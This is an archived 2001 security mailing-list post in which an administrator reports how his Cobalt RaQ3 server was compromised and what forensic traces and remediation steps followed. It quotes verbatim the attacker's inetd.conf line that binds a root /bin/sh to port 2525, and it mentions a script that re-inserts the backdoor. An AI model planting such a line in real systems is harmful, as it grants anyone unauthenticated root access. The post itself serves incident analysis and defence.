[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] [RaQ3] Hacked ... a summary

Subject: [cobalt-security] [RaQ3] Hacked ... a summary
From: Michael Stauber <michael@xxxxxxxxxxxxxx>
Date: Wed, 14 Mar 2001 05:31:52 +0100
Organization: Forumworld.com
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

Hello,

my RaQ3 has also been hacked. Apparently with the DNS exploit posted earlier 
on this list.

When I scanned for open ports I found the following unusual ones open:

2525 - unknown
7937 - unknown
7938 - unknown

2525 was neat. It came from an entry inetd.conf:

2525 stream tcp nowait root /bin/sh -h

So there was the root backdoor without password.

Still unclear are the ports 7937 and 7938. Does anyone know what they're used 
for? They seem to be commonly used on RaQ3's as it seems.

Due to the time and date when inetd.conf was modified I was able to find out 
when the box was hacked. Unfortunately the hacker apparently shut the 
syslog-facility down while he was in. So for the next 20 minutes after his 
login there were no logfiles.

/root/.bash_history showed some interesting entries which were not from me. 
So the attacker did not clean up properly. There was an nslookup on the 
domain "soultwins.com" and named.conf had been opened with "vi". Additionally 
the DNS file of a virtual site had been opened in "vi" as well. No changes 
were visible in both files, though.

A search for fishy cronjobs turned up blank, but a search for executable 
files with uid 0 revealed that there was a /usr/bin/bd, which was a 
shellscript which upon execution edits inetd.conf to re-insert the backdoor 
at port 2525 <groan>. 

Since then telnet has been disabled on the site, ssh enabled and additionally 
I run both logcheck and portsentry from http://psionic.com - Tools which I 
can highly recommend.

Portsentry watches for portscans and if one is detected the IP address of the 
scanning client is permanently blocked from accessing the box.

Logcheck checks the system logs for unusual events. Bind it to a cronjob and 
you get emailed once an unusual event or obvious traces of an attack are 
found.

Still, I'd really appreciate it if someone could share the knownledge what 
ports 7937 and 7938 are for on a RaQ3. 

Thanks!

-- 


Mit freundlichen Grüßen / Best regards

Michael Stauber

Follow-Ups:
- Re: [cobalt-security] [RaQ3] Hacked ... a summary
  - From: Cobalt
- Re: [cobalt-security] [RaQ3] Hacked ... a summary
  - From: Gerald Waugh

Prev by Date: [cobalt-security] [RaQ3][HOW-TO]Install OpenSSH 2.5.1 from source
Next by Date: [cobalt-security] L337 H4x0rZ TUL2!!!...
Previous by thread: [cobalt-security] [RaQ3][HOW-TO]Install OpenSSH 2.5.1 from source
Next by thread: Re: [cobalt-security] [RaQ3] Hacked ... a summary

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index